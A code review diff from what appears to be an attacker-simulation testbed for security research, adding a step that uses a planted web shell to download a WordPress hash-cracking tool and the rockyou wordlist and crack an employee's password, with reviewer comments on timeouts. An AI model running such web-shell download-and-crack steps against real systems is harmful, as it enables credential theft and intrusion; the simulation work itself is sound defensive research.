src/cr_kyoushi/statemachines/aecid_attacker/actions.py

```diff
@@ -510,6 +510,83 @@ def __call__(
             log.error("No post to upload shell to")
 
 
+class WPHashCrack:
+    """Transition function uses WP hash cracker to find employee password."""
+
+    def __init__(self, wl_host, attacked_user):
+        """
+        Args:
+            wl_host: address of the host where wordlist is available.
+            attacked_user: the name of the WP user to crack the password.
+        """
+        self.url = (
+            "https://github.com/ait-aecid/wphashcrack/archive/refs/tags/v0.1.tar.gz"
+        )
+        self.wl_host = wl_host
+        self.attacked_user = attacked_user
+
+    def __call__(
+        self,
+        log: BoundLogger,
+        current_state: str,
+        context: Context,
+        target: Optional[str],
+    ):
+        web_shell = context.web_shell
+        log = log.bind(
+            url=self.url,
+            wl_host=self.wl_host,
+            attacked_user=self.attacked_user,
+            web_shell=web_shell,
+        )
+        if web_shell is not None:
+            log.info("Download WPHashCrack")
+            output = send_request(
+                log, web_shell, ["wget", self.url], "wp_meta", False, None
+            )
+            sleep(3)
+            log.info("Web shell command response", output=output)
+            log.info("Extract WPHashCrack")
+            output = send_request(
+                log, web_shell, ["tar", "xvfz", "v0.1.tar.gz"], "wp_meta", False, None
+            )
+            sleep(3)
+            log.info("Web shell command response", output=output)
+            output = send_request(
+                log,
+                web_shell,
+                ["wget", "http://" + self.wl_host + "/rockyou.txt"],
+                "wp_meta",
+                False,
+                None,
+            )
+            sleep(3)
+            log.info("Web shell command response", output=output)
+            log.info("Download password list")
+            output = send_request(
+                log,
+                web_shell,
+                [
+                    "./wphashcrack-0.1/wphashcrack.sh",
+                    "-w",
+                    "$PWD/rockyou.txt",
+                    "-j",
+                    "./wphashcrack-0.1/john-1.7.6-jumbo-12-Linux64/run",
+                    "-u",
+                    self.attacked_user,
```

Comment:
I am assuming this is a long running command. While the client side will wait forever with this configuration I am not sure if the server side process will not timeout at some point. This should be tested.

Reply:
You are right, this could be a problem. I will test it.

Reply:
I tested it and after 38 minutes the password was cracked and the state machine resumed. I think this is fine for now, there may be timeouts when it takes even longer but this should not occur in the test runs anyway.